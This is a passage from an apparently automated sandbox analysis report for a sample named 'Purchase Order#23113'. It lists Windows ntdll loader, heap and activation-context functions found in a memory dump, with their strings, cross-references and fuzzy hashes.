                                                                            • RtlGetAssemblyStorageRoot, xrefs: 017A2160, 017A219A, 017A21BA
                                                                            • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 017A2178
                                                                            • SXS: %s() passed the empty activation context, xrefs: 017A2165
                                                                            • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 017A219F
                                                                            • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 017A21BF
                                                                            • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 017A2180
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                            • API String ID: 0-861424205
                                                                            • Opcode ID: 324a2fc34d002b66213e2d6382cd2c21a04e40e42f3317bfee276c80a0ce3957
                                                                            • Instruction ID: b56229ad1adb29513a23d60a7e253524e0c70a4a10fbc675dd691000ea439c95
                                                                            • Opcode Fuzzy Hash: 324a2fc34d002b66213e2d6382cd2c21a04e40e42f3317bfee276c80a0ce3957
                                                                            • Instruction Fuzzy Hash: 21313576B80215B7E7258A9DCC85F9AFA6CDBA4A40F054169FF04B7146D270AE00C7A1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0176C6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            • minkernel\ntdll\ldrinit.c, xrefs: 0176C6C3
                                                                            • LdrpInitializeImportRedirection, xrefs: 017A8177, 017A81EB
                                                                            • Loading import redirection DLL: '%wZ', xrefs: 017A8170
                                                                            • Unable to build import redirection Table, Status = 0x%x, xrefs: 017A81E5
                                                                            • LdrpInitializeProcess, xrefs: 0176C6C4
                                                                            • minkernel\ntdll\ldrredirect.c, xrefs: 017A8181, 017A81F5
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                            • API String ID: 0-475462383
                                                                            • Opcode ID: 15e8c4d902841f7b643f3cce2153a44bcb66c1ac12ff2dd26f519c2cf97cb762
                                                                            • Instruction ID: 9e3f194c11cada4fe2155a87bba23375d60763d850e249dc390ee8db20600dc1
                                                                            • Opcode Fuzzy Hash: 15e8c4d902841f7b643f3cce2153a44bcb66c1ac12ff2dd26f519c2cf97cb762
                                                                            • Instruction Fuzzy Hash: C23106B16443429FD325EF28D859E2AF7E4AF94B10F00055CFD815B299D660ED04CBA2
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0177096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 01772DF0: LdrInitializeThunk.NTDLL ref: 01772DFA
                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01770BA3
                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01770BB6
                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01770D60
                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01770D74
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 1404860816-0
                                                                            • Opcode ID: 54e30a67be4bb3bf21625dc410c678ba191004ae45da9e2e5c8597e5ba0e8158
                                                                            • Instruction ID: 294aec694b496bb388cb65d9927a39ad470499d1fe9ee1a2d8527e6ab75bad3b
                                                                            • Opcode Fuzzy Hash: 54e30a67be4bb3bf21625dc410c678ba191004ae45da9e2e5c8597e5ba0e8158
                                                                            • Instruction Fuzzy Hash: A6427C71900715DFDB21CF28C884BAAB7F4FF49304F1445AAEA89DB245E770AA84CF61
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0173A3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                            • API String ID: 0-379654539
                                                                            • Opcode ID: 9428beb9232e44f36038252b4cfa400e2493c3e7c943f4ffe5e0fe9c2600a709
                                                                            • Instruction ID: 204b753e69195aad9da9ea3a1843ca08d0e71c61dc3572be8246aa6abc2507a0
                                                                            • Opcode Fuzzy Hash: 9428beb9232e44f36038252b4cfa400e2493c3e7c943f4ffe5e0fe9c2600a709
                                                                            • Instruction Fuzzy Hash: 8CC15674108382DFDB11DF58C045B6AFBE4AF95704F0489AAF9D6CB292E734CA49CB52
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 01768402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            • minkernel\ntdll\ldrinit.c, xrefs: 01768421
                                                                            • @, xrefs: 01768591
                                                                            • LdrpInitializeProcess, xrefs: 01768422
                                                                            • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0176855E
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                            • API String ID: 0-1918872054
                                                                            • Opcode ID: 19d7fc730624691cca0b1c803f7521839232dd3e5fcd66e3cca29017b00c067e
                                                                            • Instruction ID: 155a98c67026559d5ed83f444e3bd933b13a9dad264448ecedae1ef35d44da62
                                                                            • Opcode Fuzzy Hash: 19d7fc730624691cca0b1c803f7521839232dd3e5fcd66e3cca29017b00c067e
                                                                            • Instruction Fuzzy Hash: 089189B1508345AFDB22DF25CC44FBBFAECEB84744F80092EFA8496156E734D9048B62
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0176273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            • SXS: %s() passed the empty activation context, xrefs: 017A21DE
                                                                            • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 017A21D9, 017A22B1
                                                                            • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 017A22B6
                                                                            • .Local, xrefs: 017628D8
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                            • API String ID: 0-1239276146
                                                                            • Opcode ID: ca921221edd4ff7072300fc0381c1c1c925bc784735eba9d45f306bfab422e9e
                                                                            • Instruction ID: 299935536e5a70445eaf632474a6d78ec26c5875d90e59543aa934c348074875
                                                                            • Opcode Fuzzy Hash: ca921221edd4ff7072300fc0381c1c1c925bc784735eba9d45f306bfab422e9e
                                                                            • Instruction Fuzzy Hash: 6FA1A03194422ADBDB65CF68CC88BA9F7B5BF98314F1541E9DD48A7292D7309E80CF90
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 01764AD0 Relevance: 5.2, Strings: 4, Instructions: 228COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            • SXS: %s() called with invalid flags 0x%08lx, xrefs: 017A342A
                                                                            • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 017A3456
                                                                            • RtlDeactivateActivationContext, xrefs: 017A3425, 017A3432, 017A3451
                                                                            • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 017A3437
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                                            • API String ID: 0-1245972979
                                                                            • Opcode ID: d318b21c381089decbdf8137aa1a8ff49b5529fb68daf47987c101f53f8f9ddf
                                                                            • Instruction ID: a17cb9123b7041cec6de0c1789eec40e5e72f3faaab0ead6e59dc717738c260c
                                                                            • Opcode Fuzzy Hash: d318b21c381089decbdf8137aa1a8ff49b5529fb68daf47987c101f53f8f9ddf
                                                                            • Instruction Fuzzy Hash: 486111766007129BD726CF1CC885B3AF7E9FFC0B50F548669E95A9B245CB30E801CB91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 017364AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01790FE5
                                                                            • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 017910AE
                                                                            • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0179106B
                                                                            • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01791028
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                            • API String ID: 0-1468400865
                                                                            • Opcode ID: 2d7cfb22c3b98c3a8776d061c68822ac8f53b0c144750329c149aeeca79b7474
                                                                            • Instruction ID: edb1c165c01fbd6ee90b699cfc7afcae01eeb58de4fbdaa5f1c78e597994a378
                                                                            • Opcode Fuzzy Hash: 2d7cfb22c3b98c3a8776d061c68822ac8f53b0c144750329c149aeeca79b7474
                                                                            • Instruction Fuzzy Hash: DC71C4B1504305AFCB21DF18C888B9BBFA9EF94764F500468F9488B18BD734D689CBD2
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0175245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            • apphelp.dll, xrefs: 01752462
                                                                            • minkernel\ntdll\ldrinit.c, xrefs: 0179A9A2
                                                                            • LdrpDynamicShimModule, xrefs: 0179A998
                                                                            • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0179A992
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                            • API String ID: 0-176724104
                                                                            • Opcode ID: 177f8688152c4c147c3053fd9cb0319cf4f8c86dc9bb47e86fdebf6434bd2960
                                                                            • Instruction ID: 16ebcf08774cd4105eff6bd1ddece48654c2b65bb82d6530acfa5d221b7b60e4
                                                                            • Opcode Fuzzy Hash: 177f8688152c4c147c3053fd9cb0319cf4f8c86dc9bb47e86fdebf6434bd2960
                                                                            • Instruction Fuzzy Hash: 09314871A00201EBDF329F5DE895A6AFBB5FB84710F254059ED00A724AD7B45A85CB80
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 017429A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            • HEAP: , xrefs: 01743264
                                                                            • HEAP[%wZ]: , xrefs: 01743255
                                                                            • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 0174327D
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                            • API String ID: 0-617086771
                                                                            • Opcode ID: 810492220d10d4c951e6205823cbbfa11fa4db71baba553591361c0bb0e1b965
                                                                            • Instruction ID: 6923ae33e1ede5849c32b2db0d08caa43051991a760c7241c48573af34bf1d80
                                                                            • Opcode Fuzzy Hash: 810492220d10d4c951e6205823cbbfa11fa4db71baba553591361c0bb0e1b965
                                                                            • Instruction Fuzzy Hash: 7692AB71A046599FEB25CF68D444BAEFBF1FF48300F188099E899AB392D735A941CF50
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 01740770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                            • API String ID: 0-4253913091
                                                                            • Opcode ID: f659f2d92c7fe2eba12e1344e2041ed895e808295329b99cd68116e2ab0a8760
                                                                            • Instruction ID: 1ccb5675b745a34f17a6e136f75a85057889f40830aa1b8ef4020fb23ab02a72
                                                                            • Opcode Fuzzy Hash: f659f2d92c7fe2eba12e1344e2041ed895e808295329b99cd68116e2ab0a8760
                                                                            • Instruction Fuzzy Hash: B8F1AB74600606DFEB26CF68D894BAAF7B5FF44300F1481A9E6169B385D734EA85CB90
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 01756962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID: $@
                                                                            • API String ID: 2994545307-1077428164
                                                                            • Opcode ID: 25dd96d62d00ab14f7ab54a9bb3915110b0f5ee15d876b17cd9305144a30671f
                                                                            • Instruction ID: 4d9c514500f4892de776b65b26614185211c2c5fb648b227c99c1b0d240e6473
                                                                            • Opcode Fuzzy Hash: 25dd96d62d00ab14f7ab54a9bb3915110b0f5ee15d876b17cd9305144a30671f
                                                                            • Instruction Fuzzy Hash: FDC290716083419FEB69CF28C881BABFBE5AF88754F44896DF989C7241D774D804CB92
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0172A197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: FilterFullPath$UseFilter$\??\
                                                                            • API String ID: 0-2779062949
                                                                            • Opcode ID: c6309019dc4bc91819ab36907a0b8896bcfd38ac703f14d9d729cacdb54f6049
                                                                            • Instruction ID: e71b6a7d1dc35cc9b37f9cb1bab4548466d5b1f42271a7477bb0eda6ab6b042a
                                                                            • Opcode Fuzzy Hash: c6309019dc4bc91819ab36907a0b8896bcfd38ac703f14d9d729cacdb54f6049
                                                                            • Instruction Fuzzy Hash: C4A14C719416299BDB32EF68CC88BEAF7B8EF44710F1041E9E909A7250D7359E85CF50
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 01750BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            • minkernel\ntdll\ldrinit.c, xrefs: 0179A121
                                                                            • LdrpCheckModule, xrefs: 0179A117
                                                                            • Failed to allocated memory for shimmed module list, xrefs: 0179A10F
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                            • API String ID: 0-161242083
                                                                            • Opcode ID: 8614991a2e9021f8b85734ac57ee03a7c85a8be278d3da93afe859754c071efb
                                                                            • Instruction ID: e8b1b143c65c239a59f02888702f51d901c594050d76dbf95a22316b9314414c
                                                                            • Opcode Fuzzy Hash: 8614991a2e9021f8b85734ac57ee03a7c85a8be278d3da93afe859754c071efb
                                                                            • Instruction Fuzzy Hash: EA71CF70A002059FDF26DF68C994ABEF7F4FB44304F24846DE802AB255E774AE81CB50
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 01740A5B Relevance: 3.9, Strings: 3, Instructions: 190COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                            • API String ID: 0-1334570610
                                                                            • Opcode ID: 977dd9ab6413690959300636ab0f160887afd38a048a1d478c1e366663be3cc1
                                                                            • Instruction ID: 744dc45f388daacf0d277a42be35c4d34a5fe97463bc17b53d54159c02430775
                                                                            • Opcode Fuzzy Hash: 977dd9ab6413690959300636ab0f160887afd38a048a1d478c1e366663be3cc1
                                                                            • Instruction Fuzzy Hash: D961A070600301DFDB2ACF28D844BAAFBE1FF45708F14859AE5558B296D770E941CB95
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0176C720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            • LdrpInitializePerUserWindowsDirectory, xrefs: 017A82DE
                                                                            • minkernel\ntdll\ldrinit.c, xrefs: 017A82E8
                                                                            • Failed to reallocate the system dirs string !, xrefs: 017A82D7
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                            • API String ID: 0-1783798831
                                                                            • Opcode ID: f45d0d38ef0ce8d94c846ed36f50154b17e1c5357bbe27eac8af1646398a0d43
                                                                            • Instruction ID: 9bc065b2b5ddb101738f7a952c9754e873f486d79a2f2ef14eb05ca012466e0d
                                                                            • Opcode Fuzzy Hash: f45d0d38ef0ce8d94c846ed36f50154b17e1c5357bbe27eac8af1646398a0d43
                                                                            • Instruction Fuzzy Hash: 9A41CF71544311ABC732EF68D848B5BF7E8FB48650F10892AFE98D3295E774D9008B92
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 017EC188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            • PreferredUILanguages, xrefs: 017EC212
                                                                            • @, xrefs: 017EC1F1
                                                                            • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 017EC1C5
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                            • API String ID: 0-2968386058
                                                                            • Opcode ID: f835dea1fb29dc57a445baffedc2cb745d4218f39646524942e728d4a77b9afc
                                                                            • Instruction ID: 263dfbdc5179beb234f91a6413b022abd1922a3084ef6f2bd4780b71e4ee4c10
                                                                            • Opcode Fuzzy Hash: f835dea1fb29dc57a445baffedc2cb745d4218f39646524942e728d4a77b9afc
                                                                            • Instruction Fuzzy Hash: B8418375E04219EBDF12DBD8C859FEEFBFCAB18704F10406AE609B7240D7749A448B50
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 017C4144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                            • API String ID: 0-1373925480
                                                                            • Opcode ID: 69b6a4366d48d164839c18b6c57761c54cbb0e1a117a98f942fe5f62735a545a
                                                                            • Instruction ID: d36840e083c6461e3094238595bfba5fea09a5075e5e45e850d1c9455866b6ac
                                                                            • Opcode Fuzzy Hash: 69b6a4366d48d164839c18b6c57761c54cbb0e1a117a98f942fe5f62735a545a
                                                                            • Instruction Fuzzy Hash: 8241F372A042588BEB26DBE8CC58BADFBB9FFA5B40F14045DD942EB785D7748901CB10
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 017B4755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 017B4888
                                                                            • minkernel\ntdll\ldrredirect.c, xrefs: 017B4899
                                                                            • LdrpCheckRedirection, xrefs: 017B488F
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                            • API String ID: 0-3154609507
                                                                            • Opcode ID: ed8523b3eb5965d21915ca7301f414c978b5a7bb16c935a2039a8c329e906480
                                                                            • Instruction ID: 1750b3ba3d392de61f200a0822b763ec551ed660ca01ce348e861a5bfebc43d7
                                                                            • Opcode Fuzzy Hash: ed8523b3eb5965d21915ca7301f414c978b5a7bb16c935a2039a8c329e906480
                                                                            • Instruction Fuzzy Hash: 5141A372A447519FCB22CE5DD8C0BA6FBE4AF49650F050669ED8BD7257D730E800CB91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 01740BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                            • API String ID: 0-2558761708
                                                                            • Opcode ID: 8282ec6e78eb59f48dee1b7c5cdaee008811f73c95c14594984923604a60d39a
                                                                            • Instruction ID: e004d0dc8d41594d81ff3cbb5ccb7500000ab659c04f16371dbf1532d31b9971
                                                                            • Opcode Fuzzy Hash: 8282ec6e78eb59f48dee1b7c5cdaee008811f73c95c14594984923604a60d39a
                                                                            • Instruction Fuzzy Hash: 11112170315122CFDB6ACB18D854FBAF3A4EF40615F18816AF606CB265DB30D845CB44
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 017B20DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            • Process initialization failed with status 0x%08lx, xrefs: 017B20F3
                                                                            • minkernel\ntdll\ldrinit.c, xrefs: 017B2104
                                                                            • LdrpInitializationFailure, xrefs: 017B20FA
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                            • API String ID: 0-2986994758
                                                                            • Opcode ID: fdfd8e136f198ee38b94825e1e836f228c2f413e4081b43eefc2d54013893ebf
                                                                            • Instruction ID: e0167b30d4c7a33d60a326c9584e0af075d266b751c7b81b8d7e78d0a18cccf4
                                                                            • Opcode Fuzzy Hash: fdfd8e136f198ee38b94825e1e836f228c2f413e4081b43eefc2d54013893ebf
                                                                            • Instruction Fuzzy Hash: A0F0C87578130CAFEB34EA4CDC67FD9B768EB44B54F504069FA006B68AD6B0A600CA51
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 017403E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
